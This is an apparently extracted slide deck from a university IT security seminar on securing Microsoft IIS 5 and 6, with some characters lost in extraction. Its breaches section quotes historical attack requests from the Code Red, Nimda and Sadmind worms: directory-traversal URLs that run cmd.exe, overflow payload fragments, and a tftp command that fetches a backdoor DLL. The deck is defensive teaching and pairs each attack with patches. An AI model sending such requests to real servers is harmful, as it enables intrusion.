IIS Security

1
IIS Security

• Laurie Walters
• Lxm30_at_psu.edu
• Security Operations and Services
• A Unit of Information Technology Services

2
Note

• Powerpoint slides to this and other seminars,
  links to utilities, patches, and suggestions for
  securing Windows operating systems and
  applications can be found at http//www.personal.
  psu.edu/lxm30/windows/windows.html

3
IIS Security Seminar Objectives

• IIS 5 Security
• Securing Server and Creating Web Data
• Installation of IIS 5
• IIS 5 Management
• Backing Up IIS Configuration files
• Securing IIS manually and with IIS Lockdown tool
• IIS 6 Installation and Security
• Authentication
• FTP and SMTP
• Logging
• Common IIS Breaches and how to prevent them

4
Secure Your System Before Installing IIS

• Install IIS on Standalone server NOT on a
  Domain Controller or other application server
• Format drives using NTFS instead of FAT
• Make sure ALL accounts have good passwords
  (includes OS accounts and application accounts)
• Install all OS patches
• Install application patches
• Apply appropriate security policies for local
  machine (see XP II seminar notes for some
  suggested guidelines) include Auditing.

5
Creating Data for IIS

• Do not place data in default IIS directory
  (C\Inetpub\WWWRoot)
• If possible, store data on a different partition
  than your o.s.
• Check permissions for data to make sure that
  Everyone doesnt have Full Control (the default
  is for Everyone to have full control).

6
Demonstration of Appropriate Permissions for Web
Data

• Navigate to data folder and right click on it
• Ensure that Administrator and System have full
  control and that the Everyone group doesnt.
• If the Everyone group has full control, remove
  that group.
• Add Authenticated users grant the appropriate
  permissions
• Demonstration of appropriate permissions

7
IIS Security Seminar Objectives

• IIS 5 Security
• Securing Server and Creating Web Data
• Installation of IIS 5
• IIS 5 Management
• Backing Up IIS Configuration files
• Securing IIS manually and with IIS Lockdown tool
• IIS 6 Installation and Security
• Authentication
• FTP and SMTP
• Logging
• Common IIS Breaches and how to prevent them

8
Installing IIS 5

• IIS Patch must be applied before machine is
  networked!
• http//support.microsoft.com/default.aspx?scidkb
  3ben-us3b811114
• It is better to install IIS after operating
  system is secured than while initially setting up
  OS.
• Add / Remove Programs ? Add / Remove Windows
  Components

9
IIS 5 Installation

• By default, the following are installed
• Common Files
• Documentation
• Front Page 2000 Server Extensions
• IIS Snap-In
• SMTP service
• WWW Service
• WWWAdmin Service
• Do not install Documentation on a production web
  server.
• If you are not using Form Mail, do not install
  SMTP service.

10
IIS 5 Installation

• The following are not installed by default
• FTP Service
• Scripts virtual directory
• Do not install these unless absolutely necessary

11
IIS 5 Installation

• Adds Internet Information Services snap in (ISM)
  and server extension administrator snap in to
  Administrative Tools.
• Adds accounts
• IUSR_MACHINENAME built in account for anonymous
  IIS access
• IWAM_MACHINENAME built in account for out of
  process access

12
Uninstallation of IIS 5

• Following arent uninstalled
• \Inetpub
• \Systemroot\Help\iishelp
• \Systemroot\system32\inetsrv
• Following users are not removed
• IUSR_Machinename
• IWAM_Machinename

13
IIS Security Seminar Objectives

• IIS 5 Security
• Securing Server and Creating Web Data
• Installation of IIS 5
• IIS 5 Management
• Backing Up IIS Configuration files
• Securing IIS manually and with IIS Lockdown tool
• IIS 6 Installation and Security
• Authentication
• FTP and SMTP
• Logging
• Common IIS Breaches and how to prevent them

14
Managing IIS 5

• After IIS is installed, you can access it one of
  two ways
• Internet Service Manager (ISM)
• HTML ISM

15
Internet Service Manager

• Can be accessed through
• Start ? Settings ? Control Panel ? Administrative
  Tools ? Internet Service Manager
• You can create an ISM shortcut on your desktop by
  right clicking on the ISM icon and clicking on
  Create Shortcut, then drag that shortcut to the
  desktop.

16
HTML ISM

• Web-page version of your ISM that can be accessed
  to remotely manage your IIS application (not
  necessarily recommended!)
• Accessed though the following URL
• http//localhostXXX/IISAdmin/iis.asp
• Where XXX is the port number of your
  Administration Web Site.
• Anonymous access to this site is not enabled by
  default (if accessing remotely, you will need a
  windows administrator username and password)

17
Finding the Port Number of Administration Web Site

• Open up normal ISM through the Control Panel.
• Right click on Administration Web Site
• Choose Properties
• The Web Site tab will appear by default. On this
  tab, at the top, under Web Site Administation
  will be TCP Port followed by a number in the
  box. This is your XXX port.
• You can change this random port to anything youd
  like.

18
IIS Security Seminar Objectives

• IIS 5 Security
• Securing Server and Creating Web Data
• Installation of IIS 5
• IIS 5 Management
• Backing Up IIS Configuration files
• Securing IIS manually and with IIS Lockdown tool
• IIS 6 Installation and Security
• Authentication
• FTP and SMTP
• Logging
• Common IIS Breaches and how to prevent them

19
Backing Up IIS Metabase

• The IIS Metabase is similar to the Windows
  registry. It stores configuration entries for
  IIS.
• It is a memory-resident database at
• C\Winnt\System32\Inetsrv\Metabase.bin
• The Metabase can become corrupted so it should be
  backed up every time a change is made to IIS.
• You cannot easily restore IIS Metabase info. to
  another computer
• http//support.microsoft.com/?kbid301386

20
Backing Up IIS Metabase

• To backup the Metabase, in the ISM, right click
  on your server icon and select Backup/Restore
  Configuration.
• Click on Create Backup and enter a meaningful
  name.

21
IIS Security Seminar Objectives

• IIS 5 Security
• Securing Server and Creating Web Data
• Installation of IIS 5
• IIS 5 Management
• Backing Up IIS Configuration files
• Securing IIS manually and with IIS Lockdown tool
• IIS 6 Installation and Security
• Authentication
• FTP and SMTP
• Logging
• Common IIS Breaches and how to prevent them

22
Ways to Overcome Common IIS Breaches Other Than
Patching

• Patching prevents current vulnerabilities

23
Other means than patching help secure against
future vulnerabilities

• Always install IIS on NTFS formatted drives
• Install IIS on separate hard drive or
• Do not allow everyone or the IUSR account to run
  .exe (e.g. cmd.exe) commands
• Use URLScan and IIS Lockdown Tools
• Follow suggested SOS guidelines for securing OS
  and IIS

24
IIS Lockdown Tool

• http//www.microsoft.com/technet/treeview/default.
  asp?url/technet/security/tools/Tools/locktool.asp
  
• Turns off unnecessary services and features of
  IIS.

25
URLScan

• Part of IIS Lockdown tool. It also turns off
  unneeded features and restricts type of HTTP
  requests that the server can process.
• Execute the following command
• Iislockd.exe /q /c tltc\lockdown_files
• It will install urlscan.exe to this folder.
• Run Urlscan.exe to install it.

26
What can be filtered with URLScan

• Request method (verb) e.g. GET, Head, Post, etc.
• File extension of the resource requested
• Suspicious URL encoding
• Presence of non-ASCII characters in the URL
• Presence of specified character sequences in the
  URL
• Presence of specified headers in the request

27
Additional abilities of URLScan 2.5

• Ability to change the log file directory
• Ability to log long URLs
• Ability to restrict the size of requests

28
Securing IIS 5 Manually

• Change permissions on vital files
• Cacls systemroot\.exe /T /G SystemF
  AdministratorsF
• Also change permission for the file command.com
• Do not use Default Web Site create a New Web
  Site
• Stop or Delete Administrative Web Site
• Remove IIS Samples and Documentation
• Group all static content separate from scripts,
  executables, etc.
• Remove Unnecessary script mappings

29
Make sure you have the correct version of MDAC

• MDAC provides the underlying functionality for
  database operations, like connecting to remote
  databases and returning data to a client.
• Heap overflow vulnerability in versions 2.6 and
  lower.
• If you do not need MDAC, remove this virtual
  directory from your system. 

30
Removing Unnecessary Script Mappings

• .ida, .idq, .htw Index Services
• .htr web-based Windows Password reset
• .printer Internet Printing Protocol
• .stm, .shtm, .shtml Server-side includes
• .idc database applications

31
Disabling Parent Paths

• Parent Paths allow you to use relative file path
  names (../directory/file.html instead of
  c/directory/file.html).
• The vulnerability in Parent Paths is that they
  can be exploited to move in reverse through file
  structure to get to root of C/,
• Then one can traverse to known file locations
  that are
• more permissive (e.g. C\wwwroot\inetpub\scripts)
  or
• contain goodies (e.g. C\winnt\system32)

32
You can disable parent paths and still use
relative pathnames

• Note It is possible to use relative pathnames
  with some effort.
• (e.g. if your IIS data folder is in a different
  folder than your database and you dont want to
  use absolute pathnames for everything).
• You have to use some coding to make a variable
  for the absolute pathname and use it to implement
  relative pathnames.
• http//www.windowswebsolutions.com/Articles/Index.
  cfm?ArticleID23278

33
(No Transcript)
34
IIS Security Seminar Objectives

• IIS 5 Security
• Securing Server and Creating Web Data
• Installation of IIS 5
• IIS 5 Management
• Backing Up IIS Configuration files
• Securing IIS manually and with IIS Lockdown tool
• IIS 6 Installation and Security
• Authentication
• FTP and SMTP
• Logging
• Common IIS Breaches and how to prevent them

35
IIS 6 Installation

• By default, the following are installed
• Common Files
• Documentation
• IIS Snap-In
• WWW Service
• Front Page (Office) Server Extensions and Asp
  .NET installed if you check these options
• Do not install Documentation on a production web
  server.
• If you are not using Form Mail, do not install
  SMTP service.

36
IIS 6 Installation

• The following are not installed by default
• FTP Service
• Scripts virtual directory
• Do not install these unless absolutely necessary

37
IIS 6 Installation

• Installed by Manage Your Server in Start ?
  Administrative Tools
• Choose Add or Remove a Role
• Choose Application Server
• Follow the prompts, and choose whether to install
  the ASP .NET and Frontpage Server Extensions

38
IIS 6 Installation

• Adds Internet Information Services snap in (ISM)
  and server extension administrator snap in to
  Administrative Tools.
• Adds accounts
• IUSR_MACHINENAME built in account for anonymous
  IIS access
• IWAM_MACHINENAME built in account for out of
  process access

39
Uninstallation of IIS 6

• Following arent uninstalled
• \Inetpub
• \Systemroot\Help\iishelp
• \Systemroot\system32\inetsrv
• Following users are not removed
• IUSR_Machinename
• IWAM_Machinename

40
Installing IIS 6

• With IIS 6, you have to actually turn on the
  features youd like to use
• Under ISM, click on Web Service Extensions
• Features currently installed in IIS will be
  listed on the right hand side
• All Unknown ISAPI Extensions
• All Unknown CGI Extensions
• Active Server Pages
• FrontPage Server Extensions 2002 (only if you
  installed)
• Internet Data Connector
• Server Side Includes
• WebDAV
• All are prohibited until you click allow. You
  can add new web service extensions as needed

41
Demonstrations

• IIS Lockdown Tool for IIS 5
• Manually securing IIS 5
• Manually securing IIS 6

42
IIS Security Seminar Objectives

• IIS 5 Security
• Securing Server and Creating Web Data
• Installation of IIS 5
• IIS 5 Management
• Backing Up IIS Configuration files
• Securing IIS manually and with IIS Lockdown tool
• IIS 6 Installation and Security
• Authentication
• FTP and SMTP
• Logging
• Common IIS Breaches and how to prevent them

43
IIS Authentication

• To set means of IIS Authentication, right click
  on your web site and select properties, then
  choose the directory security tab. Click on the
  Edit button next to Anonymous access and
  Authentication control.
• Anonymous - uses IUSR_Machinename to anonymously
  access the site
• Integrated Windows users connect to the machine
  with a Windows username and password
• Basic authenticates to machine using
  unencrypted username / password (user accounts
  must have log on locally rights).
• Digest authentication within a W2K domain,
  password hashes compared against DC hashes.
• Kerberos authenticate to a K4 or K5 domain

44
IIS Security Seminar Objectives

• IIS 5 Security
• Securing Server and Creating Web Data
• Installation of IIS 5
• IIS 5 Management
• Backing Up IIS Configuration files
• Securing IIS manually and with IIS Lockdown tool
• IIS 6 Installation and Security
• Authentication
• FTP and SMTP
• Logging
• Common IIS Breaches and how to prevent them

45
FTP and SMTP

• Disable SMTP and FTP if not needed if absolutely
  needed, limit access by userid/pw or IP address
• Use other means than FTP if possible (WebDav,
  Terminal Services, etc).
• Allowing totally anonymous connections to machine
  bad idea.
• Specify directory where users can upload/download
  files.
• Create appropriate permissions on files in this
  directory (e.g. remote users can read but not
  write or execute files).

46
IIS Security Seminar Objectives

• IIS 5 Security
• Securing Server and Creating Web Data
• Installation of IIS 5
• IIS 5 Management
• Backing Up IIS Configuration files
• Securing IIS manually and with IIS Lockdown tool
• IIS 6 Installation and Security
• Authentication
• FTP and SMTP
• Logging
• Common IIS Breaches and how to prevent them

47
IIS Logging

• Enable extended logging properties in IIS Manager
• W3C Extended Log Format instead of Active Log
• Make sure Date, Time, Server IP, Client IP, URI
  Stem and URI Query are checked
• Daily logs kept in UTC (GMT) format in the
  following location C\Windows\System32\Logfiles\W
  3SVC1\ex020930.txt
• Check the box Use local time for file naming and
  rollover so that logs are kept in EST/EDT
  instead of GMT.

48
IIS Security Seminar Objectives

• IIS 5 Security
• Securing Server and Creating Web Data
• Installation of IIS 5
• IIS 5 Management
• Backing Up IIS Configuration files
• Securing IIS manually and with IIS Lockdown tool
• IIS 6 Installation and Security
• Authentication
• FTP and SMTP
• Logging
• Common IIS Breaches and how to prevent them

49
Common IIS Breaches

• Buffer Overflows (XXXXXXXXXXXXXXXcode)
• Directory Traversal (../../../cwinnt/system32/cmd
  .exe)
• Canonicalization
• Request unusual action using cmd.exe, .bat
• Encoded using an alternate character set (e.g.
  Unicode) or include character sequences that are
  rarely seen in legitimate requests.
• All of above used for recent worms (e.g.
  IIS/Sadmind, Code Red, Code Red 2, Nimda)

50
Buffer Overflows

• Programs dont check input for appropriate
  length.
• Extra input above and beyond maximum length gets
  attached to CPU execution stack.
• Attackers must carefully program B.O. code to
  identify the location of where it is added the
  stack, so that they can return to this location
  and execute the arbitrary input.

51
Problem with Buffer Overflows in IIS

• IIS process runs in the context of the SYSTEM
  account.
• When a Buffer Overflow is leveraged against IIS,
  arbitrary commands can be run under context of
  SYSTEM user.

52
Canonicalization

• Various file names are equivalent
• E.g. c\directory\file.html, file.html, and
  ..\..\file.html may all refer to the same file
• When some non-static file types are requested via
  a malformed URL, the canonicalization locates the
  correct file, but mixes up the actual location of
  the file.
• Since it determines the file is in a different
  folder than it actually is, it applies incorrect
  permissions.

53
Problem with Canonicalization

• A file in a folder with restricted permissions
  would be requested, however, the permissions
  granted would be of the files ancestors rather
  than actual file permissions
• If parent permissions are less restrictive, the
  attacker could get extra privileges for the
  file.

54
Directory Traversal (Dot Dot Slash)

• Results from inadequate NTFS ACLs on the
  directory or files in question.
• http//www.iistestbox.com/../../../../../winnt/sys
  tem32/cmd.exe

55
Examples of Unicode and Hex Encoding URLS

• Unicode Example Arabic letters
• Hexadecimal Examples
• Space 20
• Plus 2B
• Period 2E
• / 2F
• Colon 3A
• ? 3F
• \ 5C
• 25

56
Hexadecimal use

• Good use of hexadecimal
• http//www.iistestbox.com/files/the20name20o
• f20the20file.txt
• Bad use of hexadecimal
• http//www.iistestbox.com/..2F..2Fwinnt/file.txt
  
• Double decoding of hex
• IIS performs two decodes of HTTP requests that
  traverse executable directories
• 255c
• 1st decode 5c
• 2nd decode \

57
IIS Sadmind Worm

• GET /scripts/../../winnt/system32/cmd.exe /cdir
  200 - 2001-05-06 122019 10.10.10.10 -
  10.20.20.20 80
• GET /scripts/../../winnt/system32/cmd.exe
  /cdir..\ 200 - 2001-05-06 122019 10.10.10.10
  - 10.20.20.20 80 \
• GET /scripts/../../winnt/system32/cmd.exe
  /ccopy\winnt\system32\cmd.exeroot.exe 502 -
  2001-05-06 122019 10.10.10.10 - 10.20.20.20 80
  \
• GET /scripts/root.exe /cecholtHTML code inserted
  heregt.././index.asp 502 -

58
Affects of IIS / Sadmind

• sadmind/IIS worm exploited a vulnerability in
  Solaris systems The Solaris worm created a root
  shell on the infected host and automatically
  attacked other vulnerable Solaris systems.
• It subsequently installed software to attack and
  deface Microsoft IIS web servers

59
Ways to Protect Against IIS Sadmind

• Microsoft Patch MS00-078 to prevent
  Canonicalization
• Disable Parent paths
• Restrict Access to cmd.exe so that it cant be
  used by the worm

60
.printer Buffer Overflow (jill.c)

• .printer Web based control of networked printers
• GET /NULL.printer HTTP/1.0
• Host 420character buffer
• Instead of crashing, IIS automatically restarts
  itself due to Redundancy
• Jill exploits .printer B.O. vulnerability to
  create a remote shell, where attacker can enter
  any command at the following prompt
• C\WINNT\System32gt

61
Ways to protect against Jill B.O.

• Microsoft Patch MS01-023
• If not using IPP,
• Unmap the .printer DLL file extension in IIS so
  that it is not loaded on IIS startup.
• Or, you could delete the file C\Winnt\System32\ms
  w3prt.dll which is the actual file that the
  .printer extension points to.

62
.ida/.idq Buffer Overflow

• .ida provides support for administrative scripts,
  
• .idq provides support for internet data queries
  (Indexing Services)
• .ida/idq B.O works by using .ida to send a
  too-long variable to the idq.dll
• GET /null.ida? 240 character bufferX HTTP/1.1
• IIS process is halted before this even reaches
  Index service, restarts IIS

63
Code Red 1 Worm (Another .ida/.idq worm)

• /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
  NNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNN
  NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
  NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
  NNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNu
  9090u6858ucbd3u7801u9090u6858ucbd3
  u7801u9090u6858ucbd3u7801u9090u9090u8190u0
  0c3u0003u8b00u531 bu53ffu0078u0000u00a

64
Affects of Code Red 1

• A machine infected with Code Red 1 scans random
  IP addresses on port 80/TCP looking for other
  hosts to infect.
• Code Red 1 is stored in memory (when machine
  reboots, worm no longer performs scans).
• Web pages on Code Red 1-infected machines may be
  defaced with the following message
• HELLO! Welcome to http//www.worm.com! Hacked By
  Chinese!

65
Ways to Protect Against Code Red 1

• Microsoft Cumulative Patch MS 02-062 (original
  patch MS01-033)
• If not using Indexing Services, remove
  application mapping for .ida and .idq
• Install URLScan to deny functionality of any
  request with hexadecimal

66
Code Red 2

• GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
  XXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
  XXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
  XXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXX
  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
  XXXXXXXXXu9090u6858ucbd3u7801u9090u6858ucbd
  3u7801 u9090u6858ucbd3u7801u9090u9090u8190
  u00c3u0003u8b0 0u531bu53ffu0078u0000u00a

67
Affects of Code Red 2

• After a successful .ida/.idq B.O., CR2 creates
  threads to scan for new infected hosts for the
  next 24 hours.
• Unlike Code Red I, CR2 is not only
  memory-resident.
• CR2 then copies cmd.exe to the file root.exe in
  the publicly accessible IIS scripts and MSADC
  folders (an intruder may then execute arbitrary
  commands with the privileges of the IIS server
  process).

68
CR2 Contains a Backdoor Trojan

• A Trojan horse copy of explorer.exe is created
  with CR2 and copied to C\ and D\.
• The Trojan horse explorer.exe calls the real
  explorer.exe to mask its existence, and creates a
  virtual mapping which exposes the C and D
  drives.
• On systems not patched against the "Relative
  Shell Path" vulnerability,this Trojan horse copy
  of explorer.exe will run every time a user logs
  in.

69
Ways to Protect Against CR2

• Microsoft Cumulative Patch MS02-062
• If not using Indexing Services, remove
  application mapping for .ida and .idq
• Install URLScan to deny functionality of any
  request with hexadecimal
• Restrict Access to cmd.exe so that it cant be
  used by the worm
• Protect against the"Relative Shell Path"
  vulnerability Microsoft Patch MS02-052

70
Nimda Worm

• Nimda worm sent with an attachment
• pretends to have a "audio/x-wav" content-type
• (Really an executable file).
• If executed, it infects the host, causing various
  files to be replaced with infected copies.
• The worm sends itself out by email, searches for
  open network shares, attempts to copy itself to
  un-patched or vulnerable Microsoft IIS web
  servers, and is a virus infecting both local
  files and files on remote network shares.

71
Nimda

• GET /scripts/root.exe?/cdir
• GET /MSADC/root.exe?/cdir
• GET /c/winnt/system32/cmd.exe?/cdir
• GET /d/winnt/system32/cmd.exe?/cdir
• GET /scripts/..5c../winnt/system32/cmd.exe?/cdir
  
• GET /_vti_bin/..5c../..5c../..5c../winnt/system
  32/cmd.exe?/cdir
• GET /_mem_bin/..5c../..5c../..5c../winnt/system
  32/cmd.exe?/cdir
• GET /msadc/..5c../..5c../..5c/..\xc1\x1c../..\x
  c1\x1c../..\xc1\x1c../winnt/system32/cmd.exe?/cdi
  r
• GET /scripts/..\xc1\x1c../winnt/system32/cmd.exe?/
  cdir
• GET /scripts/..\xc0/../winnt/system32/cmd.exe?/cd
  ir
• GET /scripts/..\xc0\xaf../winnt/system32/cmd.exe?/
  cdir
• GET /scripts/..\xc1\x9c../winnt/system32/cmd.exe?/
  cdir
• GET /scripts/..35c../winnt/system32/cmd.exe?/cdi
  r
• GET /scripts/..35c../winnt/system32/cmd.exe?/cdi
  r
• GET /scripts/..5c../winnt/system32/cmd.exe?/cdir
  
• GET /scripts/..2f../winnt/system32/cmd.exe?/cdir
  
• Note The first four entries in these sample logs
  denote attempts to connect to the backdoor left
  by Code Red II, while the remaining log entries
  are examples of exploit attempts for the
  Directory Traversal vulnerability.

72
Nimda on IIS Server

• Nimda attempts to install an Admin.dll file in
  the root directory of c\, d\, or e\ (Note that
  the file name Admin.dll may be legitimately
  installed by IIS in other directories.)
• It then scans other systems on port 80,
  attempting to infect them with Nimda

73
Nimda Backdoor

• Attackers send string /ctftp20-i20x.x.x.x20GE
  T20Admin.dll20d\Admin.dll to attempt to
  connect to infected systems.
• A return code of 200 indicates success of this
  command.)

74
Ways to Protect Against Nimda (Email Portion)

• Microsoft Patch for automatic execution of
  previewed files in Outlook (MS01-020)
• Do not open attachments without verification
• Protect against open network shares

75
Ways to Protect Against Nimda (IIS Portion)

• Microsoft Cumulative Patch MS02-062 (Protects
  against both means of Nimda IIS infection Code
  Red 2 Backdoor and Directory Traversal)
• If not using Indexing Services, remove
  application mapping for .ida and .idq
• Install URLScan to deny functionality of any
  request with hexadecimal
• Restrict Access to cmd.exe so that it cant be
  used by the worm
• Protect against the "Relative Shell Path"
  vulnerability of explorer.exe Microsoft Patch
  MS02-052
• Disable Parent Paths

76
IIS Security Seminar Objectives

• IIS 5 Security
• Securing Server and Creating Web Data
• Installation of IIS 5
• IIS 5 Management
• Backing Up IIS Configuration files
• Securing IIS manually and with IIS Lockdown tool
• IIS 6 Installation and Security
• Authentication
• FTP and SMTP
• Logging
• Common IIS Breaches and how to prevent them

77
In Conclusion

• IIS is a big target for skilled hackers as well
  as script kiddies.
• Staying current on patches will help prevent your
  IIS box from being broken in to, however, proper
  locking down will also be highly effective
  against future vulnerabilities.

78
Microsoft Security Guides

• Microsoft Guide to Securing IIS 5
• http//www.microsoft.com/technet/treeview/default
  .asp?url/technet/prodtechnol/iis/tips/iis5chk.asp
  
• Microsoft Guide to Securing Windows 2000
• http//www.microsoft.com/technet/treeview/default
  .asp?url/technet/security/prodtech/windows/secwin
  2k/default.asp

79
Slides and Recommended Guidelines

• Todays Slides, recommended guidelines for IIS,
  Windows 2000 and XP, links to security tools and
  further reading
• http//www.personal.psu.edu/lxm30/windows/windows
  .html

80